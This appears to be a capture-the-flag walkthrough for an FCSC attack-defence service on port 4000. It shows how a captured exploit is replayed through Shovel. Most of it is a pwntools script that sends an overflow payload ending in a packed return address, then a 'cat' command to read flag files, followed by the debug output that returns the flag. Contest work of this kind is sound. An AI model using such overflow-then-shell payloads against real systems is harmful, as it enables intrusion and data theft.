-
Launch Docker Container
-
Go on to http://localhost:8000 in browser to use Shovel
-
Click the last entry - > use raw data window to generate python script + copy it to a python file
-
Modify the entry :
r.sendline(b'cat /fcsc/EpGne4SB6vZpm5gvjNyqSbMxmmACNjf/*') -
to our own one:
r.sendline(b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*')
-
-
Launch the python Code (
apt install python3-pwntools -yif necessary):
#!/usr/bin/env python3
# Filename: replay-blind-4000-1524784517420974.py
import json
import os
from pwn import *
"""
This file was generated from network capture towards 10.0.2.2 (TCP).
Corresponding flow id: 1524784517420974
Service: blind-4000
"""
# Set logging level
context.log_level = "DEBUG" # or INFO, WARNING, ERROR
# Load environment variables
# EXTRA is an array of the flagids for current service and team
HOST = os.getenv("TARGET_IP")
EXTRA = json.loads(os.getenv("TARGET_EXTRA", "[]"))
# Connect to remote and run the actual exploit
# Timeout is important to prevent stall
r = remote(HOST, 4000, typ="tcp", timeout=2)
# FIXME: You should identify if a flag_id was used in the following
# payload. If it is the case, then you should loop using EXTRA.
# for flag_id in EXTRA:
data = r.recvuntil(b'e note summary.\n')
r.sendline(b'n')
data = r.recvuntil(b'vuVE8\nContent: \n')
r.sendline(b'PjiFs69P7liiKPaKS73Ym9IyPSAhw21Nd2xCCfbQSMboGcFfkYMjmY99ScBS2yjmZySDQDin64MwLI9ZhPqd1a5UZ3jpXXzv553SSHnQ7bDzLeBD5VRNMswiv36fHMu1RxkUMIRkpCqkTU2IQjZcSgF5SXOek0ifAGDXtyl1UUB34CPAqPbTq7eAtGVCoIChiYPoJJrW1JR5s6QNZWVKT7Jf5KbchBjIJjUMmbG6\xe5\x16@\x00\x00\x00\x00\x00')
r.sendline(b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*')
data = r.recvuntil(b'ca8f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n')
# Use the following to capture all remaining bytes:
# data = r.recvall(timeout=5)
# print(data)
r.close()
========================
root@servertest:/home/test/HACK# python3 blindspot.py
[+] Opening connection to None on port 4000: Done
[DEBUG] Received 0x25 bytes:
b'[n]ew note.\n'
b'[r]etrieve note summary.\n'
[DEBUG] Sent 0x2 bytes:
b'n\n'
[DEBUG] Received 0x5b bytes:
b'[*] Current session: /fcsc/C8bureAjatRpPbK2MBP73aM9GX3tBUM/GKQ5EmK6TF5TqbDYfqttQeAqDX6hTuQ\n'
[DEBUG] Received 0xa bytes:
b'Content: \n'
[DEBUG] Sent 0xf1 bytes:
00000000 50 6a 69 46 73 36 39 50 37 6c 69 69 4b 50 61 4b │PjiF│s69P│7lii│KPaK│
00000010 53 37 33 59 6d 39 49 79 50 53 41 68 77 32 31 4e │S73Y│m9Iy│PSAh│w21N│
00000020 64 32 78 43 43 66 62 51 53 4d 62 6f 47 63 46 66 │d2xC│CfbQ│SMbo│GcFf│
00000030 6b 59 4d 6a 6d 59 39 39 53 63 42 53 32 79 6a 6d │kYMj│mY99│ScBS│2yjm│
00000040 5a 79 53 44 51 44 69 6e 36 34 4d 77 4c 49 39 5a │ZySD│QDin│64Mw│LI9Z│
00000050 68 50 71 64 31 61 35 55 5a 33 6a 70 58 58 7a 76 │hPqd│1a5U│Z3jp│XXzv│
00000060 35 35 33 53 53 48 6e 51 37 62 44 7a 4c 65 42 44 │553S│SHnQ│7bDz│LeBD│
00000070 35 56 52 4e 4d 73 77 69 76 33 36 66 48 4d 75 31 │5VRN│Mswi│v36f│HMu1│
00000080 52 78 6b 55 4d 49 52 6b 70 43 71 6b 54 55 32 49 │RxkU│MIRk│pCqk│TU2I│
00000090 51 6a 5a 63 53 67 46 35 53 58 4f 65 6b 30 69 66 │QjZc│SgF5│SXOe│k0if│
000000a0 41 47 44 58 74 79 6c 31 55 55 42 33 34 43 50 41 │AGDX│tyl1│UUB3│4CPA│
000000b0 71 50 62 54 71 37 65 41 74 47 56 43 6f 49 43 68 │qPbT│q7eA│tGVC│oICh│
000000c0 69 59 50 6f 4a 4a 72 57 31 4a 52 35 73 36 51 4e │iYPo│JJrW│1JR5│s6QN│
000000d0 5a 57 56 4b 54 37 4a 66 35 4b 62 63 68 42 6a 49 │ZWVK│T7Jf│5Kbc│hBjI│
000000e0 4a 6a 55 4d 6d 62 47 36 e5 16 40 00 00 00 00 00 │JjUM│mbG6│··@·│····│
000000f0 0a │·│
000000f1
[DEBUG] Sent 0x2c bytes:
b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*\n'
[DEBUG] Received 0x46 bytes:
b'FCSC_47d5ba1574be11ecbbfdcfac58fa8e8dcc8f010894f79b8615e4d746bc857d80\n'
[*] Closed connection to None port 4000
Copy and insert the flag